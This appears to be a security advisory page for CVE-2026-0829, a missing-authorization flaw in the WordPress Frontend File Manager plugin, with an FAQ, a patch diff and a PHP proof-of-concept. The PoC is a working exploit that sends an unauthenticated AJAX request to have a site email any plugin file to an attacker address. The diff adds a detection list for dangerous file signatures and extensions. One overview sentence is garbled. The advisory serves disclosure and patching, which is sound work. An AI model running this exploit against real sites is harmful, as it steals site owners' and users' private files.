What is CVE-2026-0829?

CVE-2026-0829 is a security vulnerability affecting the Frontend File Manager plugin for WordPress, specifically versions up to and including 23.5. It allows unauthenticated users to access and exfiltrate files managed by the plugin due to a missing authorization check.

How does the vulnerability work?

The vulnerability allows attackers to send a POST request to the WordPress AJAX endpoint without any authentication. By specifying the action ‘wpfm_send_file_in_email’ along with a file ID and an email address, attackers can retrieve files without authorization.

Who is affected by this vulnerability?

Any WordPress site using the Frontend File Manager plugin version 23.5 or earlier is at risk. Administrators should check their plugin version to determine if they are affected.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Frontend File Manager plugin installed on your WordPress site. If it is version 23.5 or earlier, your site is vulnerable to CVE-2026-0829.

How can I fix this vulnerability?

To mitigate this vulnerability, update the Frontend File Manager plugin to version 23.6 or later, where the issue has been patched. Regularly check for updates to ensure your plugins are secure.

What does the CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk that should be addressed promptly to prevent potential exploitation.

What are the practical risks of this vulnerability?

If exploited, this vulnerability allows attackers to exfiltrate any files managed by the plugin, which could include sensitive documents or user data. This poses a risk of data theft and potential exposure of confidential information.

What measures can I take to mitigate risks besides updating?

In addition to updating the plugin, consider implementing security measures such as restricting access to the WordPress admin area, using web application firewalls, and monitoring for unauthorized access attempts.

How does the proof of concept demonstrate the issue?

The proof of concept provided illustrates how an attacker can use a simple PHP script to exploit the vulnerability by sending a crafted POST request. It shows the specific parameters required to retrieve files without authentication.

What other security practices should I follow?

Maintain regular backups, keep all plugins and themes updated, use strong passwords, and consider employing security plugins that offer additional layers of protection against vulnerabilities.

Is there a way to prevent similar vulnerabilities in the future?

Developers should implement strict capability checks and nonce verification for all sensitive actions in their plugins. Regular security audits and code reviews can also help identify and mitigate vulnerabilities before they are exploited.

Where can I find more information about this vulnerability?

More information about CVE-2026-0829 can be found on the National Vulnerability Database and security advisories related to the Frontend File Manager plugin. Staying informed through security blogs and forums can also be beneficial.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-0829: Frontend File Manager <= 23.5 – Missing Authorization (nmedia-user-file-uploader)

CVE ID CVE-2026-0829

Plugin nmedia-user-file-uploader

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 23.5

Patched Version 23.6

Disclosed February 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-0829:
The Frontend File Manager WordPress plugin (versions true`, allowing public access to this endpoint.

Exploitation:
Attackers can send a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `wpfm_send_file_in_email`. The request must include a `file_id` parameter containing the numeric ID of any file uploaded through the plugin and an `emailaddress` parameter containing the recipient email. No authentication credentials or nonce tokens are required. The plugin will retrieve the file via `new WPFM_File($file_id)` and email it to the specified address.

Patch Analysis:
The patch adds three security layers to the vulnerable function. First, it enables nonce verification by uncommenting the `wp_verify_nonce()` check. Second, it adds an `is_user_logged_in()` check to require authentication. Third, it adds `wpfm_is_current_user_post_author($file_id)` to verify file ownership. The plugin also changes the AJAX action registration from `true` to `false` in the arrays.php file, preventing public access. Additional security enhancements include rate limiting for file operations and improved file validation through a new security-validation.php module.

Impact:
Successful exploitation allows unauthenticated attackers to exfiltrate any file managed by the Frontend File Manager plugin. This includes user-uploaded documents, images, and potentially sensitive files if the plugin is configured to manage restricted content. The vulnerability enables data theft without requiring any user interaction or authentication, potentially exposing confidential business documents, personal information, or intellectual property stored through the plugin.

Differential between vulnerable and patched code

Code Diff

--- a/nmedia-user-file-uploader/inc/admin.php
+++ b/nmedia-user-file-uploader/inc/admin.php
@@ -260,9 +260,9 @@
 function wpfm_save_meta() {


-	/*if (empty ( $_POST ) || ! wp_verify_nonce ( $_POST ['wpfm_ajax_nonce'], 'wpfm_securing_ajax' )) {
+	if (empty ( $_POST ) || ! wp_verify_nonce ( $_POST ['wpfm_ajax_nonce'], 'wpfm_securing_ajax' )) {
 		wp_send_json_error(__("Sorry, this request cannot be completed contact admin", "wpfm"));
-	}*/
+	}

 	if( !current_user_can('manage_options') ) {
 		wp_send_json_error(__("Sorry, you are not allowed to save settings.", "wpfm"));
--- a/nmedia-user-file-uploader/inc/arrays.php
+++ b/nmedia-user-file-uploader/inc/arrays.php
@@ -181,7 +181,7 @@
 		"nm_uploadfile_move_file" 	=> true,
 		"wpfm_save_meta" 	=> false,
 		"wpfm_file_meta_update" 	=> true,
-		"wpfm_send_file_in_email"	=> true,
+		"wpfm_send_file_in_email"	=> false,
 		// "wpfm_save_ftp_files"	=> true,
 	);
 }
--- a/nmedia-user-file-uploader/inc/callback-functions.php
+++ b/nmedia-user-file-uploader/inc/callback-functions.php
@@ -14,9 +14,9 @@

 function nm_uploadfile_move_file() {

-	// if (empty ( $_POST ) || ! wp_verify_nonce ( $_POST ['wpfm_ajax_nonce'], 'wpfm_securing_ajax' )) {
-	// 	wp_send_json_error(__("Sorry, this request cannot be completed contact admin", "wpfm"));
-	// }
+	if (empty ( $_POST ) || ! wp_verify_nonce ( $_POST ['wpfm_ajax_nonce'], 'wpfm_securing_ajax' )) {
+		wp_send_json_error(__("Sorry, this request cannot be completed contact admin", "wpfm"));
+	}

 	$allow_guest = wpfm_get_option('_allow_guest_upload') == 'yes' ? true : false;
 	if( !$allow_guest && ! wpfm_is_current_user_post_author($_POST['file_id'] )) {
@@ -55,9 +55,9 @@
  */
 function wpfm_edit_file_title_desc(){

-	// if (empty ( $_POST ) || ! wp_verify_nonce ( $_POST ['wpfm_ajax_nonce'], 'wpfm_securing_ajax' )) {
-	// 	wp_send_json_error(__("Sorry, not allowed", "wpfm"));
-	// }
+	if (empty ( $_POST ) || ! wp_verify_nonce ( $_POST ['wpfm_ajax_nonce'], 'wpfm_securing_ajax' )) {
+		wp_send_json_error(__("Sorry, not allowed", "wpfm"));
+	}

 	if( ! wpfm_is_current_user_post_author($_POST['file_id'] )) {
 		wp_send_json_error(__("Sorry, not allowed", "wpfm"));
@@ -97,14 +97,22 @@
 // sending file in email
 function wpfm_send_file_in_email() {

-	// if (empty ( $_POST ) || ! wp_verify_nonce ( $_POST ['wpfm_ajax_nonce'], 'wpfm_securing_ajax' )) {
-	// 	wp_send_json_error(__("Sorry, not allowed", "wpfm"));
-	// }
+	if (empty ( $_POST ) || ! wp_verify_nonce ( $_POST ['wpfm_ajax_nonce'], 'wpfm_securing_ajax' )) {
+		wp_send_json_error(__("Sorry, not allowed", "wpfm"));
+	}
+
+	if (!is_user_logged_in()) {
+		wp_send_json_error(__("Authentication required", "wpfm"));
+	}

 	$file_id = isset($_REQUEST['file_id']) ? intval($_REQUEST['file_id']) : '';

 	$file = new WPFM_File($file_id);

+	if (!wpfm_is_current_user_post_author($file_id)) {
+		wp_send_json_error(__("Sorry, not allowed", "wpfm"));
+	}
+
 	if( empty($_POST['emailaddress']) ) {

 		wp_send_json_error( __('Recipient email not given.','wpfm') );
--- a/nmedia-user-file-uploader/inc/files.php
+++ b/nmedia-user-file-uploader/inc/files.php
@@ -68,6 +68,15 @@
 		wp_send_json_error(__("Insufficient permissions", "wpfm"));
 	}

+	// Rate limiting for directory creation
+	$user_id = get_current_user_id();
+	$rate_limit_key = 'wpfm_create_dir_' . $user_id;
+	$create_count = get_transient($rate_limit_key) ?: 0;
+
+	if ($create_count >= 5) { // 5 directories per hour
+		wp_send_json_error(__('Directory creation rate limit exceeded. Please try again later.', 'wpfm'));
+	}
+
 	$current_user = wpfm_get_current_user();
 	if( ! $current_user ) {
 		$resp = array('status' => 'error',
@@ -98,6 +107,9 @@
 			'dir_id'=>$wpfm_dir_id,
 			'message'=>__("Directory created successfully", 'wpfm')];

+	// Update rate limit counter
+	set_transient($rate_limit_key, $create_count + 1, HOUR_IN_SECONDS);
+
 	wp_send_json_success($resp);

 }
@@ -106,51 +118,37 @@
  */
 function wpfm_upload_file() {

-
 	if (! wp_verify_nonce ( $_REQUEST ['wpfm_ajax_nonce'], 'wpfm_securing_ajax' )) {
-		$response ['status'] = 'error';
-		$response ['message'] = __ ( 'Error while uploading file, please contact admin', 'wpfm' );
-		wp_send_json($response);
+		wp_send_json_error(__('Error while uploading file, please contact admin', 'wpfm'));
 	}
-
-	header ( "Expires: Mon, 26 Jul 1997 05:00:00 GMT" );
-	header ( "Last-Modified: " . gmdate ( "D, d M Y H:i:s" ) . " GMT" );
-	header ( "Cache-Control: no-store, no-cache, must-revalidate" );
-	header ( "Cache-Control: post-check=0, pre-check=0", false );
-	header ( "Pragma: no-cache" );

+	// Rate limiting check
+	$user_id = get_current_user_id();
+	$rate_limit_key = 'wpfm_upload_' . ($user_id ?: $_SERVER['REMOTE_ADDR']);
+	$upload_count = get_transient($rate_limit_key) ?: 0;
+
+	if ($upload_count >= 10) {
+		wp_send_json_error(__('Upload rate limit exceeded. Please try again later.', 'wpfm'));
+	}

-	// setting up some variables
 	$file_dir_path = wpfm_files_setup_get_directory();
-
-	$response = array ();
 	if ($file_dir_path == null) {
-
-		$response ['status'] = 'error';
-		$response ['message'] = __ ( 'Error while creating directory', 'wpfm' );
-		die ( 0 );
+		wp_send_json_error(__('Error while creating directory', 'wpfm'));
 	}
-
+
 	$file_name = '';
-
 	if( isset($_REQUEST['name']) && $_REQUEST['name'] != '') {
 		$file_name = sanitize_file_name( $_REQUEST['name'] );
 	}elseif( isset($_REQUEST['_file']) && $_REQUEST['_file'] != '') {
 		$file_name = sanitize_file_name( $_REQUEST['_file'] );
 	}

-	// Clean the fileName for security reasons
-	// $file_name = preg_replace ( '/[^w._]+/', '_', $file_name );
 	$file_name = sanitize_file_name($file_name);
-
 	$file_name = apply_filters('wpfm_uploaded_filename', $file_name);

-	/* ========== Invalid File type checking ========== */
-	$file_type = wp_check_filetype_and_ext($file_dir_path, $file_name);
+	$file_type = wp_check_filetype_and_ext('', $file_name);
 	$extension = $file_type['ext'];
-

-	// for some files if above function fails to check extension we need to check otherway
 	if( ! $extension ) {
 		$extension = pathinfo($file_name, PATHINFO_EXTENSION);
 	}
@@ -163,148 +161,39 @@
 	}else {
 		$good_types = explode(",", $allowed_types );
 	}
-

 	if( ! in_array($extension, $good_types ) ){
-		$response ['status'] = 'error';
-		$response ['message'] = __ ( 'File type not valid', 'nm-filemanager' );
-		die ( json_encode($response) );
+		wp_send_json_error(__('File type not valid', 'wpfm'));
 	}
-	/* ========== Invalid File type checking ========== */
-
-	$cleanupTargetDir = true; // Remove old files
-	$maxFileAge = 5 * 3600; // Temp file age in seconds
-
-	// 5 minutes execution time
-	@set_time_limit ( 5 * 60 );
-
-	// Uncomment this one to fake upload time
-	// usleep(5000);
-
-	// Get parameters
-	$chunk = isset ( $_REQUEST ["chunk"] ) ? intval ( $_REQUEST ["chunk"] ) : 0;
-	$chunks = isset ( $_REQUEST ["chunks"] ) ? intval ( $_REQUEST ["chunks"] ) : 0;

+	// Simple file handling for compatibility
+	$file_path = $file_dir_path . $file_name;

-
-	// Make sure the fileName is unique but only if chunking is disabled
-	if ($chunks < 2 && file_exists ( $file_dir_path . $file_name )) {
-		$ext = strrpos ( $file_name, '.' );
-		$file_name_a = substr ( $file_name, 0, $ext );
-		$file_name_b = substr ( $file_name, $ext );
+	if (isset($_FILES['file']['tmp_name']) && is_uploaded_file($_FILES['file']['tmp_name'])) {
+		if (move_uploaded_file($_FILES['file']['tmp_name'], $file_path)) {
+			set_transient($rate_limit_key, $upload_count + 1, HOUR_IN_SECONDS);

-		$count = 1;
-		while ( file_exists ( $file_dir_path . $file_name_a . '_' . $count . $file_name_b ) )
-			$count ++;
+			$response = array(
+				'file_name' => $file_name,
+				'status' => 'success',
+				'file_groups' => wpfm_get_file_groups()
+			);

-		$file_name = $file_name_a . '_' . $count . $file_name_b;
-	}
-
-	// Remove old temp files
-	if ($cleanupTargetDir && is_dir ( $file_dir_path ) && ($dir = opendir ( $file_dir_path ))) {
-		while ( ($file = readdir ( $dir )) !== false ) {
-			$tmpfilePath = $file_dir_path . $file;
-
-			// Remove temp file if it is older than the max age and is not the current file
-			if (preg_match ( '/.part$/', $file ) && (filemtime ( $tmpfilePath ) < time () - $maxFileAge) && ($tmpfilePath != "{$file_path}.part")) {
-				@unlink ( $tmpfilePath );
+			if(wpfm_is_image($file_name)) {
+				$h = wpfm_get_option('_thumb_size', 150);
+				$w = wpfm_get_option('_thumb_size', 150);
+				$thumb_size = array(array('h' => $h, 'w' => $w, 'crop' => false));
+				$thumb_meta = wpfm_create_thumb($file_dir_path, $file_name, $thumb_size);
+				$response['thumb_meta'] = $thumb_meta;
 			}
-		}

-		closedir ( $dir );
-	} else
-		die ( '{"jsonrpc" : "2.0", "error" : {"code": 100, "message": "Failed to open temp directory."}, "id" : "id"}' );
-
-	$file_path = $file_dir_path . $file_name;
-
-	// Look for the content type header
-	if (isset ( $_SERVER ["HTTP_CONTENT_TYPE"] ))
-		$contentType = $_SERVER ["HTTP_CONTENT_TYPE"];
-
-	if (isset ( $_SERVER ["CONTENT_TYPE"] ))
-		$contentType = $_SERVER ["CONTENT_TYPE"];
-
-	// Handle non multipart uploads older WebKit versions didn't support multipart in HTML5
-	if (strpos ( $contentType, "multipart" ) !== false) {
-		if (isset ( $_FILES ['file'] ['tmp_name'] ) && is_uploaded_file ( $_FILES ['file'] ['tmp_name'] )) {
-			// Open temp file
-			$out = fopen ( "{$file_path}.part", $chunk == 0 ? "wb" : "ab" );
-			if ($out) {
-				// Read binary input stream and append it to temp file
-				$in = fopen ( sanitize_text_field($_FILES ['file'] ['tmp_name']), "rb" );
-
-				if ($in) {
-					while ( $buff = fread ( $in, 4096 ) )
-						fwrite ( $out, $buff );
-				} else
-					die ( '{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}' );
-				fclose ( $in );
-				fclose ( $out );
-				@unlink ( sanitize_text_field($_FILES ['file'] ['tmp_name']) );
-			} else
-				die ( '{"jsonrpc" : "2.0", "error" : {"code": 102, "message": "Failed to open output stream."}, "id" : "id"}' );
-		} else
-			die ( '{"jsonrpc" : "2.0", "error" : {"code": 103, "message": "Failed to move uploaded file."}, "id" : "id"}' );
-	} else {
-		// Open temp file
-		$out = fopen ( "{$file_path}.part", $chunk == 0 ? "wb" : "ab" );
-		if ($out) {
-			// Read binary input stream and append it to temp file
-			$in = fopen ( "php://input", "rb" );
-
-			if ($in) {
-				while ( $buff = fread ( $in, 4096 ) )
-					fwrite ( $out, $buff );
-			} else
-				die ( '{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}' );
-
-			fclose ( $in );
-			fclose ( $out );
-		} else
-			die ( '{"jsonrpc" : "2.0", "error" : {"code": 102, "message": "Failed to open output stream."}, "id" : "id"}' );
-	}
-
-	// Check if file has been uploaded
-	if (! $chunks || $chunk == $chunks - 1) {
-		// Strip the temp .part suffix off
-		rename ( "{$file_path}.part", $file_path );
-
-		// making thumb if images
-		if(wpfm_is_image($file_name))
-		{
-			$h = wpfm_get_option('_thumb_size', 150);
-			$w = wpfm_get_option('_thumb_size', 150);
-			$thumb_size = array(array('h' => $h, 'w' => $w, 'crop' => false),
-			);
-
-			$thumb_size = apply_filters('wpfm_thumb_size', $thumb_size, $file_name);
-
-			// var_dump($file_dir_path);
-			// var_dump($file_name);
-
-			$thumb_meta = wpfm_create_thumb($file_dir_path, $file_name, $thumb_size);
-
-			$response = array(
-					'file_name'		=> $file_name,
-					'thumb_meta'	=> $thumb_meta,
-					'status' 		=> 'success',
-					'file_groups'	=> wpfm_get_file_groups());
-		}else{
-			$response = array(
-					'file_name'		=> $file_name,
-					'file_w'		=> 'na',
-					'file_h'		=> 'na',
-					'status'		=> 'success',
-					'file_groups'	=> wpfm_get_file_groups());
+			wp_send_json($response);
 		}
 	}

-	apply_filters( 'wpfm_file_upload_response', $response, $file_name);
-
-	wp_send_json($response);
+	wp_send_json_error(__('Upload failed', 'wpfm'));
 }

-
 /*
  * creating thumb using WideImage Library Since 21 April, 2013
  */
@@ -788,6 +677,15 @@
 	if (empty($_POST) || !wp_verify_nonce($_POST['wpfm_ajax_nonce'], 'wpfm_securing_ajax')) {
 		wp_send_json_error(__("File cannot be deleted, please contact admin", "wpfm"));
 	}
+
+	// Rate limiting for delete operations
+	$user_id = get_current_user_id();
+	$rate_limit_key = 'wpfm_delete_' . ($user_id ?: $_SERVER['REMOTE_ADDR']);
+	$delete_count = get_transient($rate_limit_key) ?: 0;
+
+	if ($delete_count >= 20) { // 20 deletes per hour
+		wp_send_json_error(__('Delete rate limit exceeded. Please try again later.', 'wpfm'));
+	}

 	$allow_guest = wpfm_get_option('_allow_guest_upload') == 'yes' ? true : false;
 	if( !$allow_guest && ! wpfm_is_current_user_post_author($_POST['file_id'] )) {
@@ -839,6 +737,9 @@
     	'total_filesize' => $updated_filesize
     ];

+    // Update rate limit counter
+    set_transient($rate_limit_key, $delete_count + 1, HOUR_IN_SECONDS);
+
 	wp_send_json_success($response);
 }

--- a/nmedia-user-file-uploader/inc/security-validation.php
+++ b/nmedia-user-file-uploader/inc/security-validation.php
@@ -0,0 +1,81 @@
+<?php
+/**
+ * Enhanced MIME type validation for WPFM
+ */
+
+if (!defined('ABSPATH')) {
+    exit;
+}
+
+function wpfm_validate_file_security($file_path, $file_name) {
+    // Check file extension
+    $file_type = wp_check_filetype_and_ext($file_path, $file_name);
+
+    if (!$file_type['ext'] || !$file_type['type']) {
+        return new WP_Error('invalid_file', __('Invalid file type detected', 'wpfm'));
+    }
+
+    // Get actual MIME type from file content
+    if (function_exists('finfo_open')) {
+        $finfo = finfo_open(FILEINFO_MIME_TYPE);
+        $actual_mime = finfo_file($finfo, $file_path);
+        finfo_close($finfo);
+
+        // Compare declared vs actual MIME type
+        if ($actual_mime && $actual_mime !== $file_type['type']) {
+            return new WP_Error('mime_mismatch', __('File content does not match declared type', 'wpfm'));
+        }
+    }
+
+    // Check for dangerous file signatures
+    $handle = fopen($file_path, 'rb');
+    if ($handle) {
+        $header = fread($handle, 1024);
+        fclose($handle);
+
+        // Check for executable signatures
+        $dangerous_signatures = [
+            "x4Dx5A", // PE executable
+            "x7Fx45x4Cx46", // ELF executable
+            "#!/bin/", // Shell script
+            "<?php", // PHP script
+            "<script", // JavaScript
+        ];
+
+        foreach ($dangerous_signatures as $sig) {
+            if (strpos($header, $sig) === 0 || strpos($header, $sig) !== false) {
+                return new WP_Error('dangerous_file', __('Potentially dangerous file detected', 'wpfm'));
+            }
+        }
+    }
+
+    return true;
+}
+
+function wpfm_get_secure_allowed_types() {
+    $default_safe_types = [
+        'jpg', 'jpeg', 'png', 'gif', 'webp', // Images
+        'pdf', 'doc', 'docx', 'txt', 'rtf', // Documents
+        'zip', 'rar', '7z', // Archives
+        'mp3', 'wav', 'ogg', // Audio
+        'mp4', 'avi', 'mov', 'webm' // Video
+    ];
+
+    $allowed_types = wpfm_get_option('_file_types');
+    if (!$allowed_types) {
+        return $default_safe_types;
+    }
+
+    $custom_types = array_map('trim', explode(',', strtolower($allowed_types)));
+
+    // Filter out potentially dangerous extensions
+    $dangerous_extensions = [
+        'php', 'php3', 'php4', 'php5', 'phtml', 'phps',
+        'js', 'html', 'htm', 'css',
+        'exe', 'bat', 'cmd', 'com', 'scr',
+        'sh', 'bash', 'zsh', 'fish',
+        'sql', 'db', 'sqlite'
+    ];
+
+    return array_diff($custom_types, $dangerous_extensions);
+}
--- a/nmedia-user-file-uploader/wp-file-manager.php
+++ b/nmedia-user-file-uploader/wp-file-manager.php
@@ -2,8 +2,8 @@
 /**
  * Plugin Name: WP File Manager
  * Plugin URI: https://najeebmedia.com/
- * Description: WordPress File Manager Plugin allow members and guest users to upload and manage their files on front-end.
- * Version: 23.5
+ * Description: WordPress File Manager Plugin allow members and guest users to upload and manage their files on front-end. Enhanced security with rate limiting and improved validation.
+ * Version: 23.6
  * Author: N-Media
  * Author URI: najeebmedia.com
  * Text Domain: wpfm
@@ -18,7 +18,7 @@
 define( 'WPFM_URL', untrailingslashit(plugin_dir_url( __FILE__ )) );
 define( 'WPFM_SHORT_NAME', 'wpfm' );
 define( 'WPFM_USER_UPLOADS', 'user_uploads' );
-define( 'WPFM_VERSION', '23.5' );
+define( 'WPFM_VERSION', '23.6' );


 /* ======= plugin includes =========== */

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-0829 - Frontend File Manager <= 23.5 - Missing Authorization

<?php

$target_url = "https://vulnerable-site.com/wp-admin/admin-ajax.php";
$file_id = 123; // ID of target file to exfiltrate
$recipient_email = "attacker@example.com";

// Craft the exploit payload
$post_data = array(
    'action' => 'wpfm_send_file_in_email',
    'file_id' => $file_id,
    'emailaddress' => $recipient_email
);

// Initialize cURL session
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check for errors
if (curl_errno($ch)) {
    echo "cURL Error: " . curl_error($ch) . "n";
} else {
    echo "HTTP Status: $http_coden";
    echo "Response: $responsen";
    
    // Parse JSON response
    $json_response = json_decode($response, true);
    if (isset($json_response['success']) && $json_response['success'] === true) {
        echo "[+] SUCCESS: File exfiltration triggered. Check $recipient_email for the file.n";
    } elseif (isset($json_response['success']) && $json_response['success'] === false) {
        echo "[-] FAILED: " . ($json_response['data'] ?? 'Unknown error') . "n";
    }
}

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2026-0829?
Overview of the vulnerability
CVE-2026-0829 is a security vulnerability affecting the Frontend File Manager plugin for WordPress, specifically versions up to and including 23.5. It allows unauthenticated users to access and exfiltrate files managed by the plugin due to a missing authorization check.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to send a POST request to the WordPress AJAX endpoint without any authentication. By specifying the action ‘wpfm_send_file_in_email’ along with a file ID and an email address, attackers can retrieve files without authorization.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Frontend File Manager plugin version 23.5 or earlier is at risk. Administrators should check their plugin version to determine if they are affected.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Frontend File Manager plugin installed on your WordPress site. If it is version 23.5 or earlier, your site is vulnerable to CVE-2026-0829.
How can I fix this vulnerability?
Recommended actions
To mitigate this vulnerability, update the Frontend File Manager plugin to version 23.6 or later, where the issue has been patched. Regularly check for updates to ensure your plugins are secure.
What does the CVSS score of 5.3 indicate?
Understanding the severity rating
A CVSS score of 5.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk that should be addressed promptly to prevent potential exploitation.
What are the practical risks of this vulnerability?
Potential impact on data security
If exploited, this vulnerability allows attackers to exfiltrate any files managed by the plugin, which could include sensitive documents or user data. This poses a risk of data theft and potential exposure of confidential information.
What measures can I take to mitigate risks besides updating?
Additional security practices
In addition to updating the plugin, consider implementing security measures such as restricting access to the WordPress admin area, using web application firewalls, and monitoring for unauthorized access attempts.
How does the proof of concept demonstrate the issue?
Understanding the exploit example
The proof of concept provided illustrates how an attacker can use a simple PHP script to exploit the vulnerability by sending a crafted POST request. It shows the specific parameters required to retrieve files without authentication.
What other security practices should I follow?
General WordPress security tips
Maintain regular backups, keep all plugins and themes updated, use strong passwords, and consider employing security plugins that offer additional layers of protection against vulnerabilities.
Is there a way to prevent similar vulnerabilities in the future?
Best practices for plugin development
Developers should implement strict capability checks and nonce verification for all sensitive actions in their plugins. Regular security audits and code reviews can also help identify and mitigate vulnerabilities before they are exploited.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-0829 can be found on the National Vulnerability Database and security advisories related to the Frontend File Manager plugin. Staying informed through security blogs and forums can also be beneficial.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations